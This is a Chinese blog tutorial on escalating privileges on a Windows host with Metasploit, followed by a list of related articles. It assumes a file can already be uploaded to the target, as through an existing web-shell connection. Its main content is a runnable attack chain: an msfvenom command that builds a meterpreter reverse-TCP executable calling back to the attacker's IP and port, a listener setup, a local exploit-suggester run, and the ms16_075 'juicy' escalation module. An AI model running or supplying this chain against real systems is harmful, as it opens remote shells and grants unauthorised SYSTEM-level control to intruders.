利用MSF提权

已于 2023-11-19 12:45:50 修改
阅读量349 收藏 2
点赞数 8
分类专栏: # 内网渗透-提权 文章标签: 网络安全
于 2023-11-14 17:33:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65554829/article/details/134403045
版权

Metasploit简介

        Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

利用前提

        可以进行文件上传并执行。如已经通过蚁剑连接了目标服务器

提权一般流程

在kali上生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.150.129 lport=8888 -f exe -o payload.exe

将木马上传到目标服务器并执行

进入msf进行监听

#开启监听
use exploit/multi/handler
#设置payload,本地kali的ip和端口
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.150.129
set lport 8888 
run

进行信息收集,查看系统信息和当前权限,当前权限为普通用户

挂起会话进入本地提权模块探测系统存在的exploit

background 挂起会话

use post/multi/recon/local_exploit_suggester 

#options

#sessions -l

set session 1

run

发现有五个exploit可以利用

选择相应的exploit模块进行攻击

use exploit/windows/local/ms16_075_reflection_juicy  

options

配置session

set session 1

run

提权成功

妈妈说名字很长会有傻子跟着念
关注
  • 8
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
网络安全MSF提权
一直被模仿,从未被超越
03-15 840
学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。1、当我们通过MSF成功登录靶机时,进行提权时如果报如下,表示没有拿到系统权限。5、我们找到一个漏洞,注意:这里不是每个漏洞都可以成功,要多试几个。6、再次进行渗透,成功出现meterpreter ,代表成功。3、设置 Session。2、使用本地漏洞模块。
初学MSF之渗透、提权、免杀(上)
qq_53058639的博客
08-01 1880
Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF的漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程的渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
使用MSF进行提权(windows提权、linux提权、wesng使用
最新发布
dzqxwzoe的博客
05-20 1003
MSF Windows提权​​​反弹shell​​​提权​​​END推荐阅读​​​MSF Linux提权​​​反弹shell​​​补充wesng用法​​Metasploit 是一个渗透框架,kali 内安装了,安装位置如下选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化主要作用:漏洞验证、漏洞利用、内网渗透等。
android4.0漏洞msf,Metasploit溢出samba提权漏洞
weixin_36307377的博客
06-03 493
Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,...
Kali利用MSF渗透安卓手机
weixin_51641247的博客
03-29 5469
利用Kali渗透安卓手机; MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具
MSF模拟渗透测试之攻击Android
lza20001103的博客
04-09 6966
MSF渗透测试系列之攻击Android
msf进行权限实验
b312738566的博客
12-17 424
问题一:站点问题 (1)在IE浏览器中添加站点:工具->Internet选项->添加站点 问题二:文件下载之后不能运行 1.不要下载,直接双击运行(直接运行为直接可信) 一、在msf框架上创建msf.exe木马程序,并创建监听。之后,将msf.exe上传到Windows server2008虚拟机环境上,以管理员身份运行,同时在kali环境中使用msfconsole监听得到session (1)msf上的操作命令: (2)获得se
使用MSF进行提权(windows提权、linux提权、wesng使用)
热门推荐
Love&Share
11-22 2万+
文章目录MSF Windows提权反弹shell提权END推荐阅读MSF Linux提权反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透等 MSF Windows提权 靶机: Win server2003 + iis(已.
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
常见windwos提权笔记
03-30
- **提权**: 通过MSF的模块实现从低权限shell提升至更高权限。 ##### 5.4 反弹shell - **定义**: 一种通过网络通信将目标系统的shell回传到攻击者的控制端的技术。 - **生成与连接**: - 使用`msfvenom`生成包含...
msf攻击Mysql服务.docx
04-26
2. **exploit/multi/mysql/mysql_udf_payload**:该插件专注于利用MySQL的User Defined Function (UDF)机制,通常用于root权限启动的MySQL服务,以实现root级别的提权攻击。 3. **exploit/windows/mysql/mysql_mof*...
kali linux msf系列视频教程
10-25
kali msf 系列 第四章利用快捷方式漏洞进行渗透提权 kali msf 系列 第五章利用PDF渗透提权 kali msf 系列 第六章爆破模块讲解 kali msf 系列 第七章木马生成 kali msf 系列 第八章木马免杀 kali msf 系列 第九章...
MSF使用详解
m0_52051132的博客
10-19 7980
一、 Meterpreter是什么Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。
利用msf实现反弹shell与提权(细节过程秒懂)
Naiisii的博客
01-13 6087
环境 攻击机:Kali ip:192.168.50.183 靶机:Win7(x64) 两者在同一个C段!!!! 生成payload 首先我们生成一个payload文件,如果靶机是64位的建议生成64位的payload,以免后续提权过程受阻 在线快速生成payload网站 这里的IP设置为KaliIP,端口不要与其他服务冲突 接下来我们需要把payload下载到靶机win7(如果有能者可以直接拖拽进靶机也可以) 把下载好的文件放至网页,由靶机win7通过访问网页下载 mv reverse.exe /var/
Metasploit基础
qq_45455136的博客
04-07 6801
Metasploit基础 主模块modules msfvenom msfconsole scanner handler Meterpreter 基本命令 文件交互命令 常用命令 Android常用命令 windows常用命令 msf模块提权(windows)
MSF运用外部module提权
土拨鼠挖洞中的博客
06-23 1196
1 将下载的module复制到/usr/share/metasploit-framework/modules/exploits/linux/ ;  2 useexploit/linux/telnet/AF_PACKET  3 showoptions 4  exploit 查看当前所有会话msf exploit(linux/telnet/AF_PACKET) > sessions -l  选择...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8379
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
msf提权linux
03-30
Metasploit Framework(简称MSF)是一款广泛使用的渗透测试工具,它提供了丰富的模块和功能,其中包括了一些用于在Linux系统上进行提权的模块。提权是指通过漏洞或者其他手段获取更高权限的过程。 在Metasploit Framework中,有一些常用的模块可以用于Linux系统的提权,例如: 1. exploit/linux/local/udev_netlink 这个模块利用了udev中的漏洞,通过发送特制的netlink消息来提权。 2. exploit/linux/local/overlayfs_priv_esc 这个模块利用了Linux内核中overlayfs文件系统的漏洞,通过创建特殊的文件来提权。 3. exploit/linux/local/sudo_pwfeedback 这个模块利用了sudo命令中的漏洞,通过修改sudo配置文件来提权。 这些只是Metasploit Framework中一小部分可用于Linux系统提权的模块,具体使用方法可以参考Metasploit Framework的官方文档或者相关教程。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值